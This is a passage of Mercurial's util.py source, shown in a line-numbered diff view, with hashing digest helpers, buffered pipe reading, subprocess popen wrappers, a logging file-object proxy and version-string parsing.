258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259
251
260 DIGESTS = {
252 DIGESTS = {
261 'md5': hashlib.md5,
253 'md5': hashlib.md5,
262 'sha1': hashlib.sha1,
254 'sha1': hashlib.sha1,
263 'sha512': hashlib.sha512,
255 'sha512': hashlib.sha512,
264 }
256 }
265 # List of digest types from strongest to weakest
257 # List of digest types from strongest to weakest
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267
259
268 for k in DIGESTS_BY_STRENGTH:
260 for k in DIGESTS_BY_STRENGTH:
269 assert k in DIGESTS
261 assert k in DIGESTS
270
262
271 class digester(object):
263 class digester(object):
272 """helper to compute digests.
264 """helper to compute digests.
273
265
274 This helper can be used to compute one or more digests given their name.
266 This helper can be used to compute one or more digests given their name.
275
267
276 >>> d = digester([b'md5', b'sha1'])
268 >>> d = digester([b'md5', b'sha1'])
277 >>> d.update(b'foo')
269 >>> d.update(b'foo')
278 >>> [k for k in sorted(d)]
270 >>> [k for k in sorted(d)]
279 ['md5', 'sha1']
271 ['md5', 'sha1']
280 >>> d[b'md5']
272 >>> d[b'md5']
281 'acbd18db4cc2f85cedef654fccc4a4d8'
273 'acbd18db4cc2f85cedef654fccc4a4d8'
282 >>> d[b'sha1']
274 >>> d[b'sha1']
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 >>> digester.preferred([b'md5', b'sha1'])
276 >>> digester.preferred([b'md5', b'sha1'])
285 'sha1'
277 'sha1'
286 """
278 """
287
279
288 def __init__(self, digests, s=''):
280 def __init__(self, digests, s=''):
289 self._hashes = {}
281 self._hashes = {}
290 for k in digests:
282 for k in digests:
291 if k not in DIGESTS:
283 if k not in DIGESTS:
292 raise Abort(_('unknown digest type: %s') % k)
284 raise Abort(_('unknown digest type: %s') % k)
293 self._hashes[k] = DIGESTS[k]()
285 self._hashes[k] = DIGESTS[k]()
294 if s:
286 if s:
295 self.update(s)
287 self.update(s)
296
288
297 def update(self, data):
289 def update(self, data):
298 for h in self._hashes.values():
290 for h in self._hashes.values():
299 h.update(data)
291 h.update(data)
300
292
301 def __getitem__(self, key):
293 def __getitem__(self, key):
302 if key not in DIGESTS:
294 if key not in DIGESTS:
303 raise Abort(_('unknown digest type: %s') % k)
295 raise Abort(_('unknown digest type: %s') % k)
304 return nodemod.hex(self._hashes[key].digest())
296 return nodemod.hex(self._hashes[key].digest())
305
297
306 def __iter__(self):
298 def __iter__(self):
307 return iter(self._hashes)
299 return iter(self._hashes)
308
300
309 @staticmethod
301 @staticmethod
310 def preferred(supported):
302 def preferred(supported):
311 """returns the strongest digest type in both supported and DIGESTS."""
303 """returns the strongest digest type in both supported and DIGESTS."""
312
304
313 for k in DIGESTS_BY_STRENGTH:
305 for k in DIGESTS_BY_STRENGTH:
314 if k in supported:
306 if k in supported:
315 return k
307 return k
316 return None
308 return None
317
309
318 class digestchecker(object):
310 class digestchecker(object):
319 """file handle wrapper that additionally checks content against a given
311 """file handle wrapper that additionally checks content against a given
320 size and digests.
312 size and digests.
321
313
322 d = digestchecker(fh, size, {'md5': '...'})
314 d = digestchecker(fh, size, {'md5': '...'})
323
315
324 When multiple digests are given, all of them are validated.
316 When multiple digests are given, all of them are validated.
325 """
317 """
326
318
327 def __init__(self, fh, size, digests):
319 def __init__(self, fh, size, digests):
328 self._fh = fh
320 self._fh = fh
329 self._size = size
321 self._size = size
330 self._got = 0
322 self._got = 0
331 self._digests = dict(digests)
323 self._digests = dict(digests)
332 self._digester = digester(self._digests.keys())
324 self._digester = digester(self._digests.keys())
333
325
334 def read(self, length=-1):
326 def read(self, length=-1):
335 content = self._fh.read(length)
327 content = self._fh.read(length)
336 self._digester.update(content)
328 self._digester.update(content)
337 self._got += len(content)
329 self._got += len(content)
338 return content
330 return content
339
331
340 def validate(self):
332 def validate(self):
341 if self._size != self._got:
333 if self._size != self._got:
342 raise Abort(_('size mismatch: expected %d, got %d') %
334 raise Abort(_('size mismatch: expected %d, got %d') %
343 (self._size, self._got))
335 (self._size, self._got))
344 for k, v in self._digests.items():
336 for k, v in self._digests.items():
345 if v != self._digester[k]:
337 if v != self._digester[k]:
346 # i18n: first parameter is a digest name
338 # i18n: first parameter is a digest name
347 raise Abort(_('%s mismatch: expected %s, got %s') %
339 raise Abort(_('%s mismatch: expected %s, got %s') %
348 (k, v, self._digester[k]))
340 (k, v, self._digester[k]))
349
341
350 try:
342 try:
351 buffer = buffer
343 buffer = buffer
352 except NameError:
344 except NameError:
353 def buffer(sliceable, offset=0, length=None):
345 def buffer(sliceable, offset=0, length=None):
354 if length is not None:
346 if length is not None:
355 return memoryview(sliceable)[offset:offset + length]
347 return memoryview(sliceable)[offset:offset + length]
356 return memoryview(sliceable)[offset:]
348 return memoryview(sliceable)[offset:]
357
349
358 closefds = pycompat.isposix
350 closefds = pycompat.isposix
359
351
360 _chunksize = 4096
352 _chunksize = 4096
361
353
362 class bufferedinputpipe(object):
354 class bufferedinputpipe(object):
363 """a manually buffered input pipe
355 """a manually buffered input pipe
364
356
365 Python will not let us use buffered IO and lazy reading with 'polling' at
357 Python will not let us use buffered IO and lazy reading with 'polling' at
366 the same time. We cannot probe the buffer state and select will not detect
358 the same time. We cannot probe the buffer state and select will not detect
367 that data are ready to read if they are already buffered.
359 that data are ready to read if they are already buffered.
368
360
369 This class let us work around that by implementing its own buffering
361 This class let us work around that by implementing its own buffering
370 (allowing efficient readline) while offering a way to know if the buffer is
362 (allowing efficient readline) while offering a way to know if the buffer is
371 empty from the output (allowing collaboration of the buffer with polling).
363 empty from the output (allowing collaboration of the buffer with polling).
372
364
373 This class lives in the 'util' module because it makes use of the 'os'
365 This class lives in the 'util' module because it makes use of the 'os'
374 module from the python stdlib.
366 module from the python stdlib.
375 """
367 """
376 def __new__(cls, fh):
368 def __new__(cls, fh):
377 # If we receive a fileobjectproxy, we need to use a variation of this
369 # If we receive a fileobjectproxy, we need to use a variation of this
378 # class that notifies observers about activity.
370 # class that notifies observers about activity.
379 if isinstance(fh, fileobjectproxy):
371 if isinstance(fh, fileobjectproxy):
380 cls = observedbufferedinputpipe
372 cls = observedbufferedinputpipe
381
373
382 return super(bufferedinputpipe, cls).__new__(cls)
374 return super(bufferedinputpipe, cls).__new__(cls)
383
375
384 def __init__(self, input):
376 def __init__(self, input):
385 self._input = input
377 self._input = input
386 self._buffer = []
378 self._buffer = []
387 self._eof = False
379 self._eof = False
388 self._lenbuf = 0
380 self._lenbuf = 0
389
381
390 @property
382 @property
391 def hasbuffer(self):
383 def hasbuffer(self):
392 """True is any data is currently buffered
384 """True is any data is currently buffered
393
385
394 This will be used externally a pre-step for polling IO. If there is
386 This will be used externally a pre-step for polling IO. If there is
395 already data then no polling should be set in place."""
387 already data then no polling should be set in place."""
396 return bool(self._buffer)
388 return bool(self._buffer)
397
389
398 @property
390 @property
399 def closed(self):
391 def closed(self):
400 return self._input.closed
392 return self._input.closed
401
393
402 def fileno(self):
394 def fileno(self):
403 return self._input.fileno()
395 return self._input.fileno()
404
396
405 def close(self):
397 def close(self):
406 return self._input.close()
398 return self._input.close()
407
399
408 def read(self, size):
400 def read(self, size):
409 while (not self._eof) and (self._lenbuf < size):
401 while (not self._eof) and (self._lenbuf < size):
410 self._fillbuffer()
402 self._fillbuffer()
411 return self._frombuffer(size)
403 return self._frombuffer(size)
412
404
413 def readline(self, *args, **kwargs):
405 def readline(self, *args, **kwargs):
414 if 1 < len(self._buffer):
406 if 1 < len(self._buffer):
415 # this should not happen because both read and readline end with a
407 # this should not happen because both read and readline end with a
416 # _frombuffer call that collapse it.
408 # _frombuffer call that collapse it.
417 self._buffer = [''.join(self._buffer)]
409 self._buffer = [''.join(self._buffer)]
418 self._lenbuf = len(self._buffer[0])
410 self._lenbuf = len(self._buffer[0])
419 lfi = -1
411 lfi = -1
420 if self._buffer:
412 if self._buffer:
421 lfi = self._buffer[-1].find('\n')
413 lfi = self._buffer[-1].find('\n')
422 while (not self._eof) and lfi < 0:
414 while (not self._eof) and lfi < 0:
423 self._fillbuffer()
415 self._fillbuffer()
424 if self._buffer:
416 if self._buffer:
425 lfi = self._buffer[-1].find('\n')
417 lfi = self._buffer[-1].find('\n')
426 size = lfi + 1
418 size = lfi + 1
427 if lfi < 0: # end of file
419 if lfi < 0: # end of file
428 size = self._lenbuf
420 size = self._lenbuf
429 elif 1 < len(self._buffer):
421 elif 1 < len(self._buffer):
430 # we need to take previous chunks into account
422 # we need to take previous chunks into account
431 size += self._lenbuf - len(self._buffer[-1])
423 size += self._lenbuf - len(self._buffer[-1])
432 return self._frombuffer(size)
424 return self._frombuffer(size)
433
425
434 def _frombuffer(self, size):
426 def _frombuffer(self, size):
435 """return at most 'size' data from the buffer
427 """return at most 'size' data from the buffer
436
428
437 The data are removed from the buffer."""
429 The data are removed from the buffer."""
438 if size == 0 or not self._buffer:
430 if size == 0 or not self._buffer:
439 return ''
431 return ''
440 buf = self._buffer[0]
432 buf = self._buffer[0]
441 if 1 < len(self._buffer):
433 if 1 < len(self._buffer):
442 buf = ''.join(self._buffer)
434 buf = ''.join(self._buffer)
443
435
444 data = buf[:size]
436 data = buf[:size]
445 buf = buf[len(data):]
437 buf = buf[len(data):]
446 if buf:
438 if buf:
447 self._buffer = [buf]
439 self._buffer = [buf]
448 self._lenbuf = len(buf)
440 self._lenbuf = len(buf)
449 else:
441 else:
450 self._buffer = []
442 self._buffer = []
451 self._lenbuf = 0
443 self._lenbuf = 0
452 return data
444 return data
453
445
454 def _fillbuffer(self):
446 def _fillbuffer(self):
455 """read data to the buffer"""
447 """read data to the buffer"""
456 data = os.read(self._input.fileno(), _chunksize)
448 data = os.read(self._input.fileno(), _chunksize)
457 if not data:
449 if not data:
458 self._eof = True
450 self._eof = True
459 else:
451 else:
460 self._lenbuf += len(data)
452 self._lenbuf += len(data)
461 self._buffer.append(data)
453 self._buffer.append(data)
462
454
463 return data
455 return data
464
456
465 def mmapread(fp):
457 def mmapread(fp):
466 try:
458 try:
467 fd = getattr(fp, 'fileno', lambda: fp)()
459 fd = getattr(fp, 'fileno', lambda: fp)()
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 except ValueError:
461 except ValueError:
470 # Empty files cannot be mmapped, but mmapread should still work. Check
462 # Empty files cannot be mmapped, but mmapread should still work. Check
471 # if the file is empty, and if so, return an empty buffer.
463 # if the file is empty, and if so, return an empty buffer.
472 if os.fstat(fd).st_size == 0:
464 if os.fstat(fd).st_size == 0:
473 return ''
465 return ''
474 raise
466 raise
475
467
476 def popen2(cmd, env=None, newlines=False):
468 def popen2(cmd, env=None, newlines=False):
477 # Setting bufsize to -1 lets the system decide the buffer size.
469 # Setting bufsize to -1 lets the system decide the buffer size.
478 # The default for bufsize is 0, meaning unbuffered. This leads to
470 # The default for bufsize is 0, meaning unbuffered. This leads to
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 close_fds=closefds,
473 close_fds=closefds,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 universal_newlines=newlines,
475 universal_newlines=newlines,
484 env=env)
476 env=env)
485 return p.stdin, p.stdout
477 return p.stdin, p.stdout
486
478
487 def popen3(cmd, env=None, newlines=False):
479 def popen3(cmd, env=None, newlines=False):
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 return stdin, stdout, stderr
481 return stdin, stdout, stderr
490
482
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 close_fds=closefds,
485 close_fds=closefds,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 stderr=subprocess.PIPE,
487 stderr=subprocess.PIPE,
496 universal_newlines=newlines,
488 universal_newlines=newlines,
497 env=env)
489 env=env)
498 return p.stdin, p.stdout, p.stderr, p
490 return p.stdin, p.stdout, p.stderr, p
499
491
500 class fileobjectproxy(object):
492 class fileobjectproxy(object):
501 """A proxy around file objects that tells a watcher when events occur.
493 """A proxy around file objects that tells a watcher when events occur.
502
494
503 This type is intended to only be used for testing purposes. Think hard
495 This type is intended to only be used for testing purposes. Think hard
504 before using it in important code.
496 before using it in important code.
505 """
497 """
506 __slots__ = (
498 __slots__ = (
507 r'_orig',
499 r'_orig',
508 r'_observer',
500 r'_observer',
509 )
501 )
510
502
511 def __init__(self, fh, observer):
503 def __init__(self, fh, observer):
512 object.__setattr__(self, r'_orig', fh)
504 object.__setattr__(self, r'_orig', fh)
513 object.__setattr__(self, r'_observer', observer)
505 object.__setattr__(self, r'_observer', observer)
514
506
515 def __getattribute__(self, name):
507 def __getattribute__(self, name):
516 ours = {
508 ours = {
517 r'_observer',
509 r'_observer',
518
510
519 # IOBase
511 # IOBase
520 r'close',
512 r'close',
521 # closed if a property
513 # closed if a property
522 r'fileno',
514 r'fileno',
523 r'flush',
515 r'flush',
524 r'isatty',
516 r'isatty',
525 r'readable',
517 r'readable',
526 r'readline',
518 r'readline',
527 r'readlines',
519 r'readlines',
528 r'seek',
520 r'seek',
529 r'seekable',
521 r'seekable',
530 r'tell',
522 r'tell',
531 r'truncate',
523 r'truncate',
532 r'writable',
524 r'writable',
533 r'writelines',
525 r'writelines',
534 # RawIOBase
526 # RawIOBase
535 r'read',
527 r'read',
536 r'readall',
528 r'readall',
537 r'readinto',
529 r'readinto',
538 r'write',
530 r'write',
539 # BufferedIOBase
531 # BufferedIOBase
540 # raw is a property
532 # raw is a property
541 r'detach',
533 r'detach',
542 # read defined above
534 # read defined above
543 r'read1',
535 r'read1',
544 # readinto defined above
536 # readinto defined above
545 # write defined above
537 # write defined above
546 }
538 }
547
539
548 # We only observe some methods.
540 # We only observe some methods.
549 if name in ours:
541 if name in ours:
550 return object.__getattribute__(self, name)
542 return object.__getattribute__(self, name)
551
543
552 return getattr(object.__getattribute__(self, r'_orig'), name)
544 return getattr(object.__getattribute__(self, r'_orig'), name)
553
545
554 def __delattr__(self, name):
546 def __delattr__(self, name):
555 return delattr(object.__getattribute__(self, r'_orig'), name)
547 return delattr(object.__getattribute__(self, r'_orig'), name)
556
548
557 def __setattr__(self, name, value):
549 def __setattr__(self, name, value):
558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
559
551
560 def __iter__(self):
552 def __iter__(self):
561 return object.__getattribute__(self, r'_orig').__iter__()
553 return object.__getattribute__(self, r'_orig').__iter__()
562
554
563 def _observedcall(self, name, *args, **kwargs):
555 def _observedcall(self, name, *args, **kwargs):
564 # Call the original object.
556 # Call the original object.
565 orig = object.__getattribute__(self, r'_orig')
557 orig = object.__getattribute__(self, r'_orig')
566 res = getattr(orig, name)(*args, **kwargs)
558 res = getattr(orig, name)(*args, **kwargs)
567
559
568 # Call a method on the observer of the same name with arguments
560 # Call a method on the observer of the same name with arguments
569 # so it can react, log, etc.
561 # so it can react, log, etc.
570 observer = object.__getattribute__(self, r'_observer')
562 observer = object.__getattribute__(self, r'_observer')
571 fn = getattr(observer, name, None)
563 fn = getattr(observer, name, None)
572 if fn:
564 if fn:
573 fn(res, *args, **kwargs)
565 fn(res, *args, **kwargs)
574
566
575 return res
567 return res
576
568
577 def close(self, *args, **kwargs):
569 def close(self, *args, **kwargs):
578 return object.__getattribute__(self, r'_observedcall')(
570 return object.__getattribute__(self, r'_observedcall')(
579 r'close', *args, **kwargs)
571 r'close', *args, **kwargs)
580
572
581 def fileno(self, *args, **kwargs):
573 def fileno(self, *args, **kwargs):
582 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
583 r'fileno', *args, **kwargs)
575 r'fileno', *args, **kwargs)
584
576
585 def flush(self, *args, **kwargs):
577 def flush(self, *args, **kwargs):
586 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
587 r'flush', *args, **kwargs)
579 r'flush', *args, **kwargs)
588
580
589 def isatty(self, *args, **kwargs):
581 def isatty(self, *args, **kwargs):
590 return object.__getattribute__(self, r'_observedcall')(
582 return object.__getattribute__(self, r'_observedcall')(
591 r'isatty', *args, **kwargs)
583 r'isatty', *args, **kwargs)
592
584
593 def readable(self, *args, **kwargs):
585 def readable(self, *args, **kwargs):
594 return object.__getattribute__(self, r'_observedcall')(
586 return object.__getattribute__(self, r'_observedcall')(
595 r'readable', *args, **kwargs)
587 r'readable', *args, **kwargs)
596
588
597 def readline(self, *args, **kwargs):
589 def readline(self, *args, **kwargs):
598 return object.__getattribute__(self, r'_observedcall')(
590 return object.__getattribute__(self, r'_observedcall')(
599 r'readline', *args, **kwargs)
591 r'readline', *args, **kwargs)
600
592
601 def readlines(self, *args, **kwargs):
593 def readlines(self, *args, **kwargs):
602 return object.__getattribute__(self, r'_observedcall')(
594 return object.__getattribute__(self, r'_observedcall')(
603 r'readlines', *args, **kwargs)
595 r'readlines', *args, **kwargs)
604
596
605 def seek(self, *args, **kwargs):
597 def seek(self, *args, **kwargs):
606 return object.__getattribute__(self, r'_observedcall')(
598 return object.__getattribute__(self, r'_observedcall')(
607 r'seek', *args, **kwargs)
599 r'seek', *args, **kwargs)
608
600
609 def seekable(self, *args, **kwargs):
601 def seekable(self, *args, **kwargs):
610 return object.__getattribute__(self, r'_observedcall')(
602 return object.__getattribute__(self, r'_observedcall')(
611 r'seekable', *args, **kwargs)
603 r'seekable', *args, **kwargs)
612
604
613 def tell(self, *args, **kwargs):
605 def tell(self, *args, **kwargs):
614 return object.__getattribute__(self, r'_observedcall')(
606 return object.__getattribute__(self, r'_observedcall')(
615 r'tell', *args, **kwargs)
607 r'tell', *args, **kwargs)
616
608
617 def truncate(self, *args, **kwargs):
609 def truncate(self, *args, **kwargs):
618 return object.__getattribute__(self, r'_observedcall')(
610 return object.__getattribute__(self, r'_observedcall')(
619 r'truncate', *args, **kwargs)
611 r'truncate', *args, **kwargs)
620
612
621 def writable(self, *args, **kwargs):
613 def writable(self, *args, **kwargs):
622 return object.__getattribute__(self, r'_observedcall')(
614 return object.__getattribute__(self, r'_observedcall')(
623 r'writable', *args, **kwargs)
615 r'writable', *args, **kwargs)
624
616
625 def writelines(self, *args, **kwargs):
617 def writelines(self, *args, **kwargs):
626 return object.__getattribute__(self, r'_observedcall')(
618 return object.__getattribute__(self, r'_observedcall')(
627 r'writelines', *args, **kwargs)
619 r'writelines', *args, **kwargs)
628
620
629 def read(self, *args, **kwargs):
621 def read(self, *args, **kwargs):
630 return object.__getattribute__(self, r'_observedcall')(
622 return object.__getattribute__(self, r'_observedcall')(
631 r'read', *args, **kwargs)
623 r'read', *args, **kwargs)
632
624
633 def readall(self, *args, **kwargs):
625 def readall(self, *args, **kwargs):
634 return object.__getattribute__(self, r'_observedcall')(
626 return object.__getattribute__(self, r'_observedcall')(
635 r'readall', *args, **kwargs)
627 r'readall', *args, **kwargs)
636
628
637 def readinto(self, *args, **kwargs):
629 def readinto(self, *args, **kwargs):
638 return object.__getattribute__(self, r'_observedcall')(
630 return object.__getattribute__(self, r'_observedcall')(
639 r'readinto', *args, **kwargs)
631 r'readinto', *args, **kwargs)
640
632
641 def write(self, *args, **kwargs):
633 def write(self, *args, **kwargs):
642 return object.__getattribute__(self, r'_observedcall')(
634 return object.__getattribute__(self, r'_observedcall')(
643 r'write', *args, **kwargs)
635 r'write', *args, **kwargs)
644
636
645 def detach(self, *args, **kwargs):
637 def detach(self, *args, **kwargs):
646 return object.__getattribute__(self, r'_observedcall')(
638 return object.__getattribute__(self, r'_observedcall')(
647 r'detach', *args, **kwargs)
639 r'detach', *args, **kwargs)
648
640
649 def read1(self, *args, **kwargs):
641 def read1(self, *args, **kwargs):
650 return object.__getattribute__(self, r'_observedcall')(
642 return object.__getattribute__(self, r'_observedcall')(
651 r'read1', *args, **kwargs)
643 r'read1', *args, **kwargs)
652
644
653 class observedbufferedinputpipe(bufferedinputpipe):
645 class observedbufferedinputpipe(bufferedinputpipe):
654 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
646 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
655
647
656 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
648 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
657 bypass ``fileobjectproxy``. Because of this, we need to make
649 bypass ``fileobjectproxy``. Because of this, we need to make
658 ``bufferedinputpipe`` aware of these operations.
650 ``bufferedinputpipe`` aware of these operations.
659
651
660 This variation of ``bufferedinputpipe`` can notify observers about
652 This variation of ``bufferedinputpipe`` can notify observers about
661 ``os.read()`` events. It also re-publishes other events, such as
653 ``os.read()`` events. It also re-publishes other events, such as
662 ``read()`` and ``readline()``.
654 ``read()`` and ``readline()``.
663 """
655 """
664 def _fillbuffer(self):
656 def _fillbuffer(self):
665 res = super(observedbufferedinputpipe, self)._fillbuffer()
657 res = super(observedbufferedinputpipe, self)._fillbuffer()
666
658
667 fn = getattr(self._input._observer, r'osread', None)
659 fn = getattr(self._input._observer, r'osread', None)
668 if fn:
660 if fn:
669 fn(res, _chunksize)
661 fn(res, _chunksize)
670
662
671 return res
663 return res
672
664
673 # We use different observer methods because the operation isn't
665 # We use different observer methods because the operation isn't
674 # performed on the actual file object but on us.
666 # performed on the actual file object but on us.
675 def read(self, size):
667 def read(self, size):
676 res = super(observedbufferedinputpipe, self).read(size)
668 res = super(observedbufferedinputpipe, self).read(size)
677
669
678 fn = getattr(self._input._observer, r'bufferedread', None)
670 fn = getattr(self._input._observer, r'bufferedread', None)
679 if fn:
671 if fn:
680 fn(res, size)
672 fn(res, size)
681
673
682 return res
674 return res
683
675
684 def readline(self, *args, **kwargs):
676 def readline(self, *args, **kwargs):
685 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
677 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
686
678
687 fn = getattr(self._input._observer, r'bufferedreadline', None)
679 fn = getattr(self._input._observer, r'bufferedreadline', None)
688 if fn:
680 if fn:
689 fn(res)
681 fn(res)
690
682
691 return res
683 return res
692
684
693 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
685 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
694 DATA_ESCAPE_MAP.update({
686 DATA_ESCAPE_MAP.update({
695 b'\\': b'\\\\',
687 b'\\': b'\\\\',
696 b'\r': br'\r',
688 b'\r': br'\r',
697 b'\n': br'\n',
689 b'\n': br'\n',
698 })
690 })
699 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
691 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
700
692
701 def escapedata(s):
693 def escapedata(s):
702 if isinstance(s, bytearray):
694 if isinstance(s, bytearray):
703 s = bytes(s)
695 s = bytes(s)
704
696
705 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
697 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
706
698
707 class fileobjectobserver(object):
699 class fileobjectobserver(object):
708 """Logs file object activity."""
700 """Logs file object activity."""
709 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
701 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
710 self.fh = fh
702 self.fh = fh
711 self.name = name
703 self.name = name
712 self.logdata = logdata
704 self.logdata = logdata
713 self.reads = reads
705 self.reads = reads
714 self.writes = writes
706 self.writes = writes
715
707
716 def _writedata(self, data):
708 def _writedata(self, data):
717 if not self.logdata:
709 if not self.logdata:
718 self.fh.write('\n')
710 self.fh.write('\n')
719 return
711 return
720
712
721 # Simple case writes all data on a single line.
713 # Simple case writes all data on a single line.
722 if b'\n' not in data:
714 if b'\n' not in data:
723 self.fh.write(': %s\n' % escapedata(data))
715 self.fh.write(': %s\n' % escapedata(data))
724 return
716 return
725
717
726 # Data with newlines is written to multiple lines.
718 # Data with newlines is written to multiple lines.
727 self.fh.write(':\n')
719 self.fh.write(':\n')
728 lines = data.splitlines(True)
720 lines = data.splitlines(True)
729 for line in lines:
721 for line in lines:
730 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
722 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
731
723
732 def read(self, res, size=-1):
724 def read(self, res, size=-1):
733 if not self.reads:
725 if not self.reads:
734 return
726 return
735 # Python 3 can return None from reads at EOF instead of empty strings.
727 # Python 3 can return None from reads at EOF instead of empty strings.
736 if res is None:
728 if res is None:
737 res = ''
729 res = ''
738
730
739 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
731 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
740 self._writedata(res)
732 self._writedata(res)
741
733
742 def readline(self, res, limit=-1):
734 def readline(self, res, limit=-1):
743 if not self.reads:
735 if not self.reads:
744 return
736 return
745
737
746 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
738 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
747 self._writedata(res)
739 self._writedata(res)
748
740
749 def readinto(self, res, dest):
741 def readinto(self, res, dest):
750 if not self.reads:
742 if not self.reads:
751 return
743 return
752
744
753 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
745 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
754 res))
746 res))
755 data = dest[0:res] if res is not None else b''
747 data = dest[0:res] if res is not None else b''
756 self._writedata(data)
748 self._writedata(data)
757
749
758 def write(self, res, data):
750 def write(self, res, data):
759 if not self.writes:
751 if not self.writes:
760 return
752 return
761
753
762 # Python 2 returns None from some write() calls. Python 3 (reasonably)
754 # Python 2 returns None from some write() calls. Python 3 (reasonably)
763 # returns the integer bytes written.
755 # returns the integer bytes written.
764 if res is None and data:
756 if res is None and data:
765 res = len(data)
757 res = len(data)
766
758
767 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
759 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
768 self._writedata(data)
760 self._writedata(data)
769
761
770 def flush(self, res):
762 def flush(self, res):
771 if not self.writes:
763 if not self.writes:
772 return
764 return
773
765
774 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
766 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
775
767
776 # For observedbufferedinputpipe.
768 # For observedbufferedinputpipe.
777 def bufferedread(self, res, size):
769 def bufferedread(self, res, size):
778 self.fh.write('%s> bufferedread(%d) -> %d' % (
770 self.fh.write('%s> bufferedread(%d) -> %d' % (
779 self.name, size, len(res)))
771 self.name, size, len(res)))
780 self._writedata(res)
772 self._writedata(res)
781
773
782 def bufferedreadline(self, res):
774 def bufferedreadline(self, res):
783 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
775 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
784 self._writedata(res)
776 self._writedata(res)
785
777
786 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
778 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
787 logdata=False):
779 logdata=False):
788 """Turn a file object into a logging file object."""
780 """Turn a file object into a logging file object."""
789
781
790 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
782 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
791 logdata=logdata)
783 logdata=logdata)
792 return fileobjectproxy(fh, observer)
784 return fileobjectproxy(fh, observer)
793
785
794 def version():
786 def version():
795 """Return version information if available."""
787 """Return version information if available."""
796 try:
788 try:
797 from . import __version__
789 from . import __version__
798 return __version__.version
790 return __version__.version
799 except ImportError:
791 except ImportError:
800 return 'unknown'
792 return 'unknown'
801
793
802 def versiontuple(v=None, n=4):
794 def versiontuple(v=None, n=4):
803 """Parses a Mercurial version string into an N-tuple.
795 """Parses a Mercurial version string into an N-tuple.
804
796
805 The version string to be parsed is specified with the ``v`` argument.
797 The version string to be parsed is specified with the ``v`` argument.
806 If it isn't defined, the current Mercurial version string will be parsed.
798 If it isn't defined, the current Mercurial version string will be parsed.
807
799
808 ``n`` can be 2, 3, or 4. Here is how some version strings map to
800 ``n`` can be 2, 3, or 4. Here is how some version strings map to
809 returned values:
801 returned values:
810
802
811 >>> v = b'3.6.1+190-df9b73d2d444'
803 >>> v = b'3.6.1+190-df9b73d2d444'
812 >>> versiontuple(v, 2)
804 >>> versiontuple(v, 2)
813 (3, 6)
805 (3, 6)
814 >>> versiontuple(v, 3)
806 >>> versiontuple(v, 3)
815 (3, 6, 1)
807 (3, 6, 1)
816 >>> versiontuple(v, 4)
808 >>> versiontuple(v, 4)
817 (3, 6, 1, '190-df9b73d2d444')
809 (3, 6, 1, '190-df9b73d2d444')
818
810
819 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
811 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
820 (3, 6, 1, '190-df9b73d2d444+20151118')
812 (3, 6, 1, '190-df9b73d2d444+20151118')
821
813
822 >>> v = b'3.6'
814 >>> v = b'3.6'
